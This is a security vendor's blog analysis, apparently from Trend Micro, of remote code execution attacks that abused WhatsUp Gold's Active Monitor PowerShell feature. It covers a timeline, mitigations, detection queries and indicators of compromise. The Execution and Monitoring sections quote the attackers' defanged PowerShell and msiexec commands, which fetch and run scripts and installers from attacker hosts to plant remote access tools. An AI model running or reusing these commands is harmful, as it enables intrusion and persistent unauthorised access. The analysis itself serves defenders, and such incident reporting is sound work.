Exploits & Vulnerabilities
Protecting Against RCE Attacks Abusing WhatsUp Gold Vulnerabilities
In this blog entry, we provide an analysis of the recent remote code execution attacks related to Progress Software’s WhatsUp Gold that possibly abused the vulnerabilities CVE-2024-6670 and CVE-2024-6671.
Summary
- Trend Micro researchers identified remote code execution attacks on WhatsUp Gold exploiting the Active Monitor PowerShell Script since August 30.
- These attacks possibly leveraged vulnerabilities CVE-2024-6670 and CVE-2024-6671, which were patched on August 16, though active exploitation may have began on the same day just after a PoC was published on August 30.
- The timeline of events suggests that despite the availability of patches, some organisations were unable to apply them quickly, leading to incidents almost immediately following the PoC's publication.
- The abuse of NmPoller.exe to execute PowerShell scripts to download various remote access tools and attempt to gain persistence was key parts of the observed attacks.
- Mitigation steps include keeping services for corporate use under access control, immediate patch application, and close monitoring of suspicious process creation events in WhatsUp Gold environments to prevent similar incidents.
The Trend Micro Managed Extended Detection and Response (MXDR) team observed remote code execution (RCE) attacks on WhatsUp Gold, an application for network and IT infrastructure monitoring currently provided by Progress Software Corporation and its components run on Windows (Figure 1). The attacks have abused Active Monitor PowerShell Script, one of the legitimate functions of the product, since August 30.
The RCE vulnerabilities CVE-2024-6670 and CVE-2024-6671 were disclosed by the vendor on August 16; patches were made available at the same time. According to the disclosure, “if the application is configured with only a single user; a SQL Injection vulnerability allows an unauthenticated attacker to retrieve the user’s encrypted password.” However, the CVSS scores of both vulnerabilities are marked as 9.8, suggesting that RCE is possible.
In August, the vulnerability’s discoverer, Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam) has published a blog entry and provided a PoC on the subject. The PoC showed how to overwrite an arbitrary string as the new password, and that explanation matches our observations.
How attacks were observed in Trend Vision One
Initial access
Activity monitoring on Trend Vision One showed that a suspicious script retrieved from a suspicious URL was suddenly executed on the computer hosting WhatsUp Gold. The timeline prior to the incident showed no suspicious logon events, suspicious URLs accessed by users, or malware execution. These are typical events in the early stages of incidents, but if these have not appeared, it's more likely that a vulnerability has been involved.
The polling process NmPoller.exe, the WhatsUp Gold executable, seems to be able to host a script called Active Monitor PowerShell Script as a legitimate function (Figure 2). The threat actors in this case chose it to perform for remote arbitrary code execution.
The malicious code that was executed by NmPoller.exe looks like this: The first part of the square is the prefix, and the last two lines are the malicious code submitted by the threat actor. Several variations of this part have been observed, as shown in Figure 3.
Execution
Multiple PowerShell scripts were executed via NmPoller.exe. The following scripts were executed as the malicious part multiple times combined with the prefix part described in the previous section:
(New-Object System.Net.WebClient).DownloadFile('hxxps://webhook[.]site/b6ef7410-9aec8-44f7-8cdf-7890c1cf5837','c:\\programdata\\a.ps1'); powershell -exec bypass -file c:\\programdata\\a.ps1
msiexec /i hxxp://45.227.255[.]216:29742/ddQCz2CkW8/setup.msi /Qn
msiexec /i hxxps://fedko[.]org/wp-includes/ID3/setup.msi /Qn
iwr -uri hxxps://fedko[.]org/wp-includes/ID3/setup.msi -outfile c:\\windows\\temp\\MSsetup.msi ; msiexec /i c:\\windows\\temp\\MSsetup.msi /Qn
The file a.ps1 contained only one line:
["(New-Object System.Net.WebClient).DownloadFile('hxxp://185.123.100[.]160/access/Remote Access-windows64-offline.exe?language=en&app=61021689825303726412222891579678345108&hostname=hxxp://185.123.100[.]160','C:\\programdata\\ftpd32.exe');start-process C:\\programdata\\ftpd32.exe;"]
Persistence
In this case, the threat actor aimed to instal remote administration tools through PowerShell. They attempted to instal these four remote access tools (RATs) via msiexec.exe (Figure 4):
- Atera Agent
- Radmin
- SimpleHelp Remote Access
- Splashtop Remote
Atera Agent and Splashtop Remote were installed by a single msi installer retrieved from the URL, hxxps://fedko[.]org/wp-includes/ID3/setup.msi.
The incident was contained by MXDR team and no further impacts were observed. The threat actor has not yet been identified; however, the usage of multiple RATs suggests that it may be a ransomware actor.
Vulnerability discovery and exploit attempts
Event timeline
- August 16, 2024 - The product vendor released the latest patch and the CVE numbers
- August 30, 2024 5pm (UTC) - The discoverer of the vulnerability published the PoC on GitHub
- August 30, 2024 10pm (UTC) - Trend Micro MXDR team observed the first incident that abused the legitimate process of WhatsUp Gold
This timeline suggests that the exploit attempts may have been performed on the same day, just a few hours after the PoC was published. The PoC was released on the Friday before the long weekend in the US, which included a holiday, so it may have been difficult for many organisations to apply the patch immediately. However, the latest patch was provided before the PoC was released, so if there is information such as a fix high-severity vulnerability in the patch, planning to apply the patch early should help prevent damage even if no PoC is available.
Censys has issued an advisory that they observed 1,207 exposed devices online for CVE-2024-4885, another WhatsUp Gold vulnerability that has a CVSS score of 9.8 and was fixed in June. This may have attracted the attention of threat actors as an attack surface following the disclosure of serious vulnerabilities in June.
Mitigation
The affected host was affected due to the compromise of user authentication for WhatsUp Gold. Users of the product should take the following steps to avoid a similar impact:
- Apply the latest patch as soon as possible. Official documentation on the product, such as release notes and security bulletins, can be found on the vendor website.
- Keep the management console or API endpoints under access control. Avoid exposing corporate use products to the public internet to prevent to be found and scanned by threat actors.
- Use a strong password. Please note that even if you have already applied all patches and are not affected by the vulnerability, you could still be affected if you use a weak password (such as admin:admin) without access control.
Monitoring
To detect the attacks that we observed, we monitored process creation events from the following processes:
- {Instal path for WhatsUp Gold}\nmpoller.exe
For example, if C:\Programme Files (x86)\Ipswitch\WhatsUp\nmpoller.exe creates processes like the following, it is highly suspicious:
- "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -file c:\programdata\a.ps1
- "C:\Windows\system32\msiexec.exe" /i hxxps://fedko[.]org/wp-includes/ID3/setup.msi /Qn
- "C:\Windows\system32\msiexec.exe" /i hxxp://45.227.255[.]216:29742/ddQCz2CkW8/setup.msi /Qn
- "C:\Windows\system32\msiexec.exe" /i c:\windows\temp\MSsetup.msi /Qn
Query sample for Vision One Search app
- Search method: Endpoint Activity Data
- Query: "nmpoller.exe" AND eventSubId:(2 OR 101 OR 109 OR 901)
- Monitoring tips:
- Product restarting or daily logfile creation events will also appear in the results. Please monitor the events excluding regular events in your environment.
- You can also monitor for spikes in the number of events in the search result (Figure 5).
Observed attack techniques (OAT) detected using Vision One:
- External MSI Package Installation via Msiexec (High)
- Suspicious RAT (SimpleHelp) Installation (Medium)
- Suspicious RAT (AteraAgent) Installation (Medium)
- Suspicious RAT (Splashtop) File Creation (Medium)
- Malicious Software - PUA.Win32.RAdmin.E (Medium)
Please note that in the implementation, NmPoller.exe can execute PowerShell scripts without launching another powershell.exe process. If you can monitor PowerShell scripts with Antimalware Scan Interface (AMSI), verify that all scripts executed by WhatsUp Gold’s Active Monitor PowerShell Script function are the ones you expect. To reduce the monitoring effort, it is also a good idea to suspend the use of Active Monitor PowerShell Script function until the latest patch is applied.
Also, because the vulnerability CVE-2024-6670 is described as allowing the compromise of the user account, it is quite possible that attacks would be observed as other events. Considering this, until the latest patch is applied, it is worth tightening access controls to WhatsUp Gold as much as possible and closely monitoring the events of all related processes.
Conclusion
Patch management is still important but always difficult. In this case, the PoC was published several days after the patch was released, and an incident that appeared to be affected by the vulnerability was observed on the same day, just a few hours after published. This observed fact shows that if the vulnerability being fixed is marked as severe, it is strongly encouraged to apply the patch as soon as it is released, even if no PoC is available.
The key to preventing incidents like this are not limited to patch management. There should be several defences in place in addition patch management. The most common defences to mitigate risks are access control and multi-factor authentication (MFA), which security teams can apply through best practises like:
- Keeping hosts/services for corporate use under access control instead of public access
- Do not expose to the public internet the management consoles or API endpoints of products for corporate use to avoid being on threat actors scan lists.
- Enabling MFA for all network logins
- To prevent account compromise, all user accounts (whether for enterprise or personal use) logging on over the network, or logging into Windows, Linux, or web applications, are encouraged to always have MFA enabled.
- Of course, do not forget to use a strong password that has never been used in other places.
- Using passkeys
- If you have the option to use a passkey instead of a password, it would be a good idea to do so.
- Passkeys use a cryptographic key stored on the device for logins and the key is activated by local authentication such as users’ biometric just like unlocking the device. Since no need for any passwords or any typing, it means no strings of characters are involved, it is resistant to phishing.
Maintaining a daily readiness and vigilance against cyberattacks is essential to ensuring that emergency response is targeted only at things that truly require it. We hope that after reading this article, security teams will once again check that no unintended hosts or services are exposed to the public internet as part of their peacetime preparations. This approach is now known as part of attack surface management.
Organisations can also consider powerful security technologies such as Trend Vision One™, which offers multilayered protection and behaviour detection, helping block malicious tools and services before they can inflict damage on user machines and systems.
Indicators of Compromise (IOCs)
File path | SHA256 | Detection name | Description |
C:\ProgramData\a.ps1 | 6daa94a36c8ccb9442f40c81a18b8501aa360559865f211d72a74788a1bbf3coe | PUA.PS1.RemoteAdmin.A | Suspicious script executed via NmPoller.exe - the legitimate process of WhatsUp Gold |
c:\windows\temp\MSsetup.msi | f1c68574167eaea826a90595710e7ee1a1e75c95433883coe569a144f116e2bf4 | PUA.Win32.RAdmin.E | Suspicious installer executed via NmPoller.exe - the legitimate process of WhatsUp Gold |
C:\ProgramData\ftpd32.exe | 992974377793c2479065358b358bb3788078970dacc7c50b495061ccc4507b90 | - | SimpleHelp Remote Access |
URL | Description |
hxxps://webhook[.]site/b6ef7410-9aec8-44f7-8cdf-7890c1cf5837 | Hosted the contents of the suspicous script: a.ps1 |
hxxps://fedko[.]org/wp-includes/ID3/setup.msi | Hosted a combined installer for Atera Agent and Splashtop Remote |
hxxp://45.227.255[.]216:29742/ddQCz2CkW8/setup.msi | Hosted PUA.Win32.RAdmin.E |
hxxp://185.123.100[.]160/access/Remote Access-windows64-offline.exe | Hosted SimpleHelp Remote Access |
185.123.100[.]160 | Outbound connection for SimpleHelp Remote Access |